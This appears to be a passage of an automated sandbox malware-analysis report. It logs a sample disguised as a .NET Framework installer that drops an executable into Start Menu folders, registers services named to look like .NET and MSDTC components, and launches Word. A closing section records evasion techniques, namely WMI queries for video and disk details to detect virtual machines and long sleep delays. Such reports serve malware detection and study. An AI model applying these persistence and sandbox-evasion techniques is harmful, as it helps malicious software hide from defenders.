                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1053\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\2052\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1049\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\3082\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\2070\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\3076\eula.rtfJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dotNetFx40_Full_setup.exe.logJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeFile created: C:\ProgramData\Start Menu\G5K9HNJ7.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NET Memory Cache 4.0\LinkageJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSDTC Bridge 3.0.0.0\LinkageJump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C93F721 StartServiceW,4_2_6C93F721
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exe TID: 6820Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -599843s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -599713s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -599604s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -599495s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -599390s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -599280s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -599159s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -599031s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -598921s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -598796s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -598687s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -598577s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -598468s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -598359s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -598250s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -598140s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -598030s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -597921s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -597812s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -597703s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -597593s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -597480s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -597375s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -597265s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548Thread sleep time: -597156s >= -30000sJump to behavior
